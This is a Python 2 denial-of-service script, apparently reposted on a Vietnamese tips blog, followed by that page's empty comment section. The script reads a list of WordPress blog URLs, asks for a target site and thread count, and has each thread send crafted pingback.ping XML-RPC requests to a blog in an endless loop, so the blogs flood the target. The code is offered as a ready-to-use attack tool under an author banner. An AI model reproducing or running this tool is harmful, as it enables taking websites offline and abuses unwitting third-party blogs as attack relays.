#!/usr/bin/python
import sys
import socket
import threading
import time
import os
Lock = threading.Lock()
def main():
  try:
   in_file = open("list.txt","r")
  except:
   raw_input('You need a list.txt file to work')
   sys.exit(0)
  os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  print '-------------------------------------------------------------------------\n'
  print '\tXML-RPC PingBack API Remote DDoS'
  print '\tDate : 20/04/2014'
  print '\tTested on Windows 7 / Windows Server 2012 / FreeBSD 9.2'
  print '\tPython version coded by : Sikh887 \n'
  print '--------------------------------------------------------------------------\n\n '
  num_thread = input("Number of thread: ")
  url = raw_input("Target: ")
  for i in range(num_thread):
   try:
    in_line = in_file.readline()
    Thread1(url, i+1, in_line).start()
    in_line = in_line[:-1]
   except:
    pass
  time.sleep(3)


class Thread1(threading.Thread):
 def __init__(self, url, number, blog):
  self.url = url
  self.number = number
  self.blog = blog
  threading.Thread.__init__(self)
 
 def run(self):
  Lock.acquire()
  print 'Starting thread #%s'%self.number
  Lock.release()
  function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodcall><methodname>pingback.ping</methodName><params><param><value><string>%s</string></value></param>
<param><value><string>%s</string></value></param>
</params></methodCall>"%(self.url, self.blog)
  request_lenght = len(function_pingback)
  try:
   self.blog_cleaned = self.blog.split("?p=")[0]
   self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
  except:
   sys.exit(0)
  request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodcall><methodname>pingback.ping</methodName><params><param><value><string>%s</string></value></param>
<param><value><string>%s</string></value></param>
</params></methodCall>\r\n\r\n"%(self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  while True:
    time.sleep(3)
    try:
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
     s.connect((self.blog_cleaned1, 80))
     s.send(request)
     print"Thread %s | Blog %s"%(self.number, self.blog_cleaned1)
    except:
     ok = 0
main()

- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/09/share-xmlrpc-ddos-wordpress.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé